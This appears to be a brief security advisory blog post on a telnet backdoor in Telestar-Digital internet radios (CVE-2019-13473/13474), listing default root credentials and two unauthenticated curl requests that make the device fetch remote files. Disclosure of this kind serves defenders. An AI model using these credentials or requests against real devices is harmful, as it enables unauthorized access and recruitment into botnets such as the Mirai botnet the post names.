An undocumented telnet backdoor was found in a popular radio player

Summary:

The German technology company Telestar-Digital is a

popular producer of Internet radios. A backdoor was found and exploited in the devices by using

the open source tools nmap and ncrack.

The vulnerability has been given the CVE’s of CVE-2019-13473 and CVE-2019-13474.

Proof of concept

The default username’s and password’s where:

* root / password

* usb / winbond

The system runs an embedded linux kernel which is very common among IoT devices.

OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh_frame.init_array. fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes

Several actions can be performed without authentication:

Change the logo:

curl -XGET http://iphere/mylogo?url=http://example.com/own.jpg

Download a file:

curl -XGET http://iphere/LocalPlay?url=http://example.com/msg.wav&save=1

This vulnerability and backdoor is most likely to be used in bigger automated

attacks such as the Mirai botnet.

External links:

Telestar.de

Vulnerability labs article

Mirai botnet cloudflare

Mirai botnet wikipedia

Stay up to date with Vulnerability Management and build cool things with our API

This blog post is part of the exploit of the day series

where we write a shorter description about interesting

exploits that we index.